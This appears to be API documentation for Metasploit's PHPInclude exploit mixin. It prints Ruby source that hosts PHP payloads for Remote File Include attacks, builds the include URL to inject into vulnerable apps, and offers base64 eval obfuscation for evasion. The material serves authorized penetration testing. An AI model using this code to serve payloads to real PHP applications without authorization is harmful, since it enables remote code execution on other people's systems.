Module: Msf::Exploit::Remote::HttpServer::PHPInclude

Includes:

Msf::Exploit::Remote::HttpServer

Defined in:

lib/msf/core/exploit/remote/http_server/php_include.rb

Overview

This module provides methods for exploiting PHP scripts by acting as an HTTP server hosting the payload for Remote File Include vulnerabilities.

Instance Attribute Summary

Attributes included from SocketServer

#service

Instance Method Summary

• #autofilter ⇒ Object

  Since these types of vulns are Stance::Aggressive, override HttpServer’s normal non-automatic behaviour and allow things to run us automatically.

• #exploit ⇒ Object

  :category: Exploit::Remote::TcpServer overrides.

• #initialize(info = {}) ⇒ Object
• #on_request_uri(cli, request, headers = {}) ⇒ Object

  :category: Event Handlers.

• #php_include_url(sock = nil) ⇒ String

  The PHP include URL (pre-encoded).

• #send_php_payload(cli, body, headers = {}) ⇒ Object

  Transmits a PHP payload to the web application.

Methods included from Msf::Exploit::Remote::HttpServer

#add_resource, #add_robots_resource, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #start_service, #use_zlib

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Methods included from TcpServer

#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version, #start_service

Methods included from SocketServer

#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #start_service, #via_string

Instance Method Details

#autofilter ⇒ Object

Since these types of vulns are Stance::Aggressive, override HttpServer’s normal non-automatic behaviour and allow things to run us automatically

# File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 28

def autofilter
  true
end

#exploit ⇒ Object

:category: Exploit::Remote::TcpServer overrides

Override exploit() to handle service start/stop

Disables SSL for the service since we always want to serve our evil PHP files from a non-ssl server. There are two reasons for this:

1. https is only supported on PHP versions after 4.3.0 and only if the OpenSSL extension is compiled in, a non-default configuration on most systems

2. somewhat less importantly, the SSL option would conflict with the option for our client connecting to the vulnerable server

# File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 45

def exploit
  old_ssl = datastore["SSL"]
  datastore["SSL"] = false
  start_service
  datastore["SSL"] = old_ssl

  #if (datastore["SRVHOST"] == "0.0.0.0" and Rex::Socket.is_internal?(srvhost_addr))
  #	print_error("Warning: the URL used for the include might be wrong!")
  #	print_error("If the target system can route to #{srvhost_addr} it")
  #	print_error("is safe to ignore this warning. If not, try using a")
  #	print_error("reverse payload instead of bind.")
  #end

  print_status("PHP include server started.");
  php_exploit
  ::IO.select(nil, nil, nil, 5)
end

#initialize(info = {}) ⇒ Object

# File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 14

def initialize(info = {})

  # Override TCPServer's stance of passive
  super(update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive))

  register_evasion_options(
    [
      OptEnum.new('PHP::Encode', [false, 'Enable PHP code obfuscation', 'none', ['none', 'base64']]),
    ], Exploit::Remote::HttpServer::PHPInclude
  )
end

#on_request_uri(cli, request, headers = {}) ⇒ Object

:category: Event Handlers

Handle an incoming PHP code request

# File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 83

def on_request_uri(cli, request, headers={})
  # Re-generate the payload
  return if ((p = regenerate_payload(cli)) == nil)

  # Send it to the application
  send_php_payload(cli, p.encoded, headers)
end

#php_include_url(sock = nil) ⇒ String

The PHP include URL (pre-encoded)

Does not take SSL into account. For the reasoning behind this, see #exploit.

Returns:

• (String) —

  The URL to be used as the argument in a call to require, require_once, or include or include_once in a vulnerable PHP app.

# File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 100

def php_include_url(sock=nil)
  host = srvhost_addr
  if Rex::Socket.is_ipv6?(host)
    host = "[#{host}]"
  end
  "http://#{host}:#{datastore['SRVPORT']}#{get_resource()}?"
end

#send_php_payload(cli, body, headers = {}) ⇒ Object

Transmits a PHP payload to the web application

# File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 66

def send_php_payload(cli, body, headers = {})

  case datastore['PHP::Encode']
  when 'base64'
    body = "<?php eval(base64_decode('#{Rex::Text.encode_base64(body)}'));?>"
  when 'none'
    body = "<?php #{body} ?>"
  end

  send_response(cli, body, headers)
end